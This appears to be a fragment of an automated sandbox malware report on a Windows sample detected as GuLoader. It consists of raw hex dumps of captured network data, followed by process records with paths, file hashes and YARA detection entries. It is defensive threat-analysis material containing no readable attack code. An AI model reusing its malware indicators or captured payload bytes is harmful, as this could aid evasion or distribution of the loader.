                                                        2025-02-18 04:29:25 UTC1324INData Raw: 04 20 15 23 d0 48 54 6e 9d 98 d0 a6 60 ac 95 13 07 d8 3d 89 63 3a c0 4d e9 c9 a8 5d b3 4b 31 72 1c c5 5f 9b de 42 26 33 5f 3b 1d fa 1b e3 c2 60 41 d0 35 52 bd c6 8d 08 ba e8 8b 1e 4e 27 d1 46 44 58 24 32 37 58 64 d0 6c b6 be b1 7d 15 e4 d4 5a 14 28 db 63 5d 15 e8 48 99 91 13 59 72 1a 63 88 0c f7 36 df b4 9b 12 5f 79 62 9c 24 e8 aa e1 38 27 33 ff 7c db 5b 27 99 f1 d1 bd e2 c3 f2 3b a8 37 51 ae 00 9d 27 a5 89 90 9a 52 a2 1c ae ff 33 27 54 e7 37 64 74 1f bb 4e 58 12 0b da 4d a9 04 bf 21 06 6d dd 01 2f 16 95 fe ce 63 5a ff 81 e3 e2 61 2a 75 c2 13 35 8c 9d 31 62 9a 0a 3d 54 cd 69 c2 2f c3 c0 eb 70 79 ce e8 bc ce 01 d8 4c d5 df 3b 44 de 4a 15 12 84 d5 3e 61 07 05 59 b7 00 91 63 0d f6 92 49 21 5c 52 d1 22 61 a0 83 00 ea f0 77 75 bd f4 42 fc d2 03 30 8c f5 d7 6d
                                                        Data Ascii: #HTn`=c:M]K1r_B&3_;`A5RN'FDX$27Xdl}Z(c]HYrc6_yb$8'3|[';7Q'R3'T7dtNXM!m/cZa*u51b=Ti/pyL;DJ>aYcI!\R"awuB0m
                                                        2025-02-18 04:29:25 UTC1390INData Raw: ac 01 11 f6 ee c0 bd 48 8c ed 24 e5 65 84 26 93 06 07 1c 0e 08 53 a2 ae fa ac a0 48 eb b1 bb dc 83 7d 95 b0 fe ee 84 e7 de 76 e4 b6 79 22 fe 9e f6 ad 94 b5 6f 99 07 fd 66 72 ed 87 3d 41 82 9a 0d 24 82 59 3d 55 e1 ff 5b 9a d3 2c 29 8a 59 1b c1 7a f3 9d 1b cb 3a 12 08 73 e3 64 cc 81 b7 90 48 9d 70 2c 35 aa 79 d2 24 fc dc ca f0 eb 50 df d2 64 27 d4 7f ff 3c 3a 5b b0 da ec 6c 11 c6 ad 6e 96 66 f8 8b 4d c4 3f e8 03 c8 74 bf 14 2b 0e ae 62 e5 e4 9b cc 64 07 bd fd d6 57 03 0e 77 de 3b 2f c0 9e 11 8b e2 93 bf a3 46 74 f9 ec ff 21 41 f8 ac c5 57 72 0f 67 3c 07 d3 a7 6b 06 41 7f fd bc 8f d2 37 37 fc fa 22 57 26 da c0 fd 37 ae ce 4e 5c 25 5a 33 ab 75 86 c5 8e 58 6f 7d 0f bb 51 09 78 30 2a 96 d1 d1 ed 16 4f 37 23 5e 28 fc 17 eb 14 2b ef b8 51 3e 22 a0 16 e4 40 d7 9f
                                                        Data Ascii: H$e&SH}vy"ofr=A$Y=U[,)Yz:sdHp,5y$Pd'<:[lnfM?t+bdWw;/Ft!AWrg<kA77"W&7N\%Z3uXo}Qx0*O7#^(+Q>"@
                                                        2025-02-18 04:29:25 UTC1390INData Raw: 01 04 ea 9f 6d 48 a8 22 e0 bd 2e e7 cd d9 73 ed 44 24 d4 5d ea 4f 08 ea c2 e6 58 4e 52 69 4f 43 0c 05 5c c7 ed d8 30 74 ca 2e 2a c2 17 a2 f0 c4 2d 43 9a f1 97 89 e4 08 d5 89 43 e9 3a c6 2c 3b 73 6e af 32 e2 a1 61 da c0 14 ba 33 c3 ff 3f c9 6d e3 39 68 38 10 39 f6 9a df 81 83 50 51 51 99 b6 10 26 34 ce a8 9d 8f 3f 47 6c 2d 71 b9 61 6b ef c0 ab 8c c3 69 80 25 1b b4 83 95 3a 9f 6f 59 68 6c e5 57 0e f4 b4 2d ec 2a 2d 27 ab 1e 23 2b 21 f6 93 39 27 9d 86 ee 2d a1 2f ee a0 69 45 da c1 a1 e4 d8 1b c1 04 94 cb ba 95 4c 6a d7 97 b5 92 d5 2a 77 0b 87 36 b3 ab 50 6e 10 c1 16 89 3e 3a e8 dc e3 c3 e6 0f 55 91 ee 06 d0 c0 c4 48 d4 24 c0 5f 7d a8 d2 da e6 6f 63 5c 60 6f 57 bd fc b7 37 a4 b3 08 9d c7 e2 7d 59 02 87 69 cb d0 08 1b ea ec 6c 9d d7 4d 91 ac 53 ef 42 b2 17 9f
                                                        Data Ascii: mH".sD$]OXNRiOC\0t.*-CC:,;sn2a3?m9h89PQQ&4?Gl-qaki%:oYhlW-*-'#+!9'-/iELj*w6Pn>:UH$_}oc\`oW7}YilMSB
                                                        2025-02-18 04:29:25 UTC1390INData Raw: 8d d9 39 41 10 ca ef 43 2b d5 7b 83 d8 5c 82 92 0e 15 c1 85 6e 7a 60 8b 2d f0 88 8a 32 31 ce f6 b1 2c 73 75 d0 42 17 97 23 0b 5d e8 12 9a 52 af 6b 8d 49 d0 ce b4 dc f9 0a 18 3e ec 54 da 93 bf 85 02 d8 c7 01 d0 03 9b fb 70 dc ce ea e3 ae 07 a6 54 ef b0 c5 fe d4 1a 97 9c a3 2d 3c cc 8e 07 c2 62 c5 85 56 4c 49 54 29 42 f5 ed 47 e0 1b b8 c0 d8 82 f9 48 cb ef 0d bc 2e 72 a5 6d c6 b0 f1 fb d2 54 26 c3 99 bf 86 c4 c0 b4 a7 05 d1 44 a8 74 8b fa e4 f5 33 c9 d9 39 46 b4 bf e7 ec 61 a0 2d f3 68 12 c3 ac 14 e6 76 32 c6 8b f2 25 3e b0 f4 c5 c6 53 b1 0c b4 09 b6 74 c4 92 3e 04 38 b3 17 dc a9 3f 4b be 56 82 2f 2c ae fc 77 e3 60 b4 85 9f 8b 04 7a 17 42 69 ff 34 1c c1 51 d3 f8 50 da e8 a9 6d 9f 37 6f 09 4c 6c be e4 34 50 f9 a2 08 73 ee fc 03 c5 5f 19 30 c5 f7 b1 37 3b 2a
                                                        Data Ascii: 9AC+{\nz`-21,suB#]RkI>TpT-<bVLIT)BGH.rmT&Dt39Fa-hv2%>St>8?KV/,w`zBi4QPm7oLl4Ps_07;*
                                                        2025-02-18 04:29:25 UTC1390INData Raw: 86 d1 91 b5 37 0e d7 e1 9a 43 02 c5 a3 10 8d ad 24 3c 2b bd 3c 76 85 1b 6a 77 53 71 9b f4 d2 f8 c0 25 6b 76 f4 44 58 65 db 8c 14 60 e3 0f 7e 4c b6 d5 ad f7 81 d9 62 e6 25 5c 92 b0 36 85 2b c3 58 b1 3a db 83 ba 07 4d f6 14 11 d5 04 94 b4 28 9d d2 61 94 9f 54 bd 4f 17 ac 6a 8f d0 f6 21 10 63 f8 18 a9 66 33 ad e4 8f f5 e4 e1 3f 4e 03 41 89 71 64 37 27 84 cf 33 db 91 27 74 f1 92 d5 c1 11 09 68 23 22 02 ef 4b 40 4f 21 fe 90 cf f8 bf 0c 6b a1 e1 90 50 c7 68 13 66 8e 0d e3 ef 8a be 9f 90 af 28 bb 98 5c 2b 1e e5 f4 b2 53 39 ec cb dd a8 4e 70 49 2e f9 5b 3d be d2 d6 de 53 b8 4e 0b 09 36 e9 f5 82 2b 96 1f c3 87 ab b2 ed 81 61 bf 34 36 ce 8a 4b 9c 77 d0 e9 bf c1 b8 0c e5 0b b2 8c 4e ed 3b 09 6c 5b c3 e9 ad a7 ac 64 ec 75 50 44 0f 50 b0 1d 1e cb 63 2b c0 b5 a8 68 d3
                                                        Data Ascii: 7C$<+<vjwSq%kvDXe`~Lb%\6+X:M(aTOj!cf3?NAqd7'3'th#"K@O!kPhf(\+S9NpI.[=SN6+a46KwN;l[duPDPc+h
                                                        2025-02-18 04:29:25 UTC1390INData Raw: bf cc 3e b1 fb 74 62 87 66 ed 23 08 2a af 73 1b aa 95 a4 5f 75 4d a6 e9 a5 fb 74 88 d9 9e ce 1c bc 29 1a c9 56 48 6f 77 e3 08 8a 29 09 65 68 e9 f1 db 9e 3d c9 f2 b8 0e 71 1e c8 27 d8 56 f2 af a8 b3 48 e7 02 24 52 cc 4e b7 65 c6 05 aa 57 bf e1 56 aa de 27 dd bc 52 9e cc 13 0a 17 f0 bf 92 af f4 c5 53 ec 1a 96 30 70 13 ce cd 9f 3e dd 0d 44 38 69 3f e5 6e ae db 9a a2 2e 92 22 61 63 d4 fe 39 d4 c3 2b 39 ab 82 3f 6e 68 48 e6 11 23 1f f8 75 cf 7b 37 d5 9c df c6 8d 44 f3 6e 97 46 8f 25 7d e1 77 62 dc 30 44 da 9a 86 c0 46 59 6a 4b 13 a0 26 9a f9 65 97 d0 51 da 1e 65 cb 22 f9 65 80 2e 83 8d 6d 9f 8f 58 4c 73 de e2 27 f6 13 4b 2c cf 4b ff 94 eb 67 9f 53 9b ab cc 84 98 ce b2 50 7f 64 c4 26 da a9 67 24 37 4d 73 42 b8 c1 79 ff aa 95 8a 5f 83 9e 7b d2 d4 db 43 92 5f d7
                                                        Data Ascii: >tbf#*s_uMt)VHow)eh=q'VH$RNeWV'RS0p>D8i?n."ac9+9?nhH#u{7DnF%}wb0DFYjK&eQe"e.mXLs'K,KgSPd&g$7MsBy_{C_
                                                        2025-02-18 04:29:25 UTC1390INData Raw: 8a b6 6c c0 48 f2 89 66 45 97 06 57 5b 11 93 35 de 2c c2 b4 c0 8c 2f 0e 5a 40 66 01 93 99 3f 49 78 30 8d 49 6a 4f c3 c8 4c 0d 71 67 de 49 13 bb c8 77 18 32 36 77 a8 40 2d fb ca 01 89 86 b3 3f 8f 85 36 45 7f 15 3d 64 4a 41 9d d0 66 6f 2b 71 1d df 82 36 69 c8 ee 2b 8c 5e 52 ec 30 a2 9e 94 d4 71 00 6f b2 7c 8b 04 ef 93 80 04 0c 66 38 30 e9 13 7b a3 9a 94 62 d0 eb aa 8b 03 63 c9 7c bf 8e e3 8b 31 b8 14 02 fe fb da 96 b9 28 52 de 2b 50 2e 03 1a 52 b1 e1 a5 0a 85 26 eb 11 6f 28 23 95 34 cf 7a 35 d5 35 d6 11 f3 12 8d b8 8b 65 27 a5 0d e5 9e cf 37 f5 ac 5f f8 a9 e3 95 a5 c6 ec e3 f8 f9 18 33 5a bf bc 03 02 68 92 50 1b 26 d9 22 1a 1a 87 11 1c b3 6a 57 2d ae cc 2f 7c 2f 50 a0 13 ed 05 9e 39 93 1d 72 49 d3 64 5c 43 47 a1 a9 5a dc 9e 04 4e cf 2e 2c 28 93 7c 2c 7a 46
                                                        Data Ascii: lHfEW[5,/Z@f?Ix0IjOLqgIw26w@-?6E=dJAfo+q6i+^R0qo|f80{bc|1(R+P.R&o(#4z55e'7_3ZhP&"jW-/|/P9rId\CGZN.,(|,zF
                                                        2025-02-18 04:29:25 UTC1390INData Raw: b1 76 f0 ff 9a eb 85 0b af 49 b8 81 13 73 15 c4 8b cc 25 e3 60 9c 48 e5 fa e6 ce 90 7d 7f 96 5f a6 f7 53 af 16 31 9e 19 76 d5 c9 bf 80 f8 27 44 e7 3f de 35 a8 7a 3a 40 1a 3f c6 5c 54 97 b6 69 3e e4 1e 69 80 42 5c ff 1a 47 5e 16 93 dc 9e 52 29 7a b6 21 06 bf ae 3e 62 9a 0a 7a cc 25 e2 a3 35 af 54 30 ad 77 49 10 f0 6b 26 cb d9 d1 c7 1e 43 de fe b8 5a 25 0c 73 21 a8 24 4a b6 3a e4 76 8e b4 61 49 d0 b8 d0 a8 72 38 bf fe ba 68 69 82 8a c9 87 05 3c 15 f4 0f 4f bd 2a 3a fb b5 5f fa 65 06 68 52 02 46 0d 79 5a 80 e5 7e 93 8c 41 1e ed a1 03 df 5e a6 9c 7a 47 b1 48 27 42 c5 f5 79 3b 56 97 b1 58 97 22 2b e8 59 51 15 17 14 f2 fa 45 77 73 74 a0 03 66 33 7e b0 5f d0 7d 03 b8 a6 3b f5 22 3b ff c7 51 ca aa 1b 07 b5 47 7f 54 05 45 85 37 07 fc a4 fc 8e 1f 31 4a 00 bc 57 7c
                                                        Data Ascii: vIs%`H}_S1v'D?5z:@?\Ti>iB\G^R)z!>bz%5T0wIk&CZ%s!$J:vaIr8hi<O*:_ehRFyZ~A^zGH'By;VX"+YQEwstf3~_};";QGTE71JW|


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:23:28:26
                                                        Start date:17/02/2025
                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe"
                                                        Imagebase:0x400000
                                                        File size:656'403 bytes
                                                        MD5 hash:32CB6AE82E91B97AC49E6DF5412698A5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2309623021.0000000005D19000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:23:29:12
                                                        Start date:17/02/2025
                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe"
                                                        Imagebase:0x400000
                                                        File size:656'403 bytes
                                                        MD5 hash:32CB6AE82E91B97AC49E6DF5412698A5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2590367791.00000000021A9000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:23:29:26
                                                        Start date:17/02/2025
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 1928
                                                        Imagebase:0x470000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >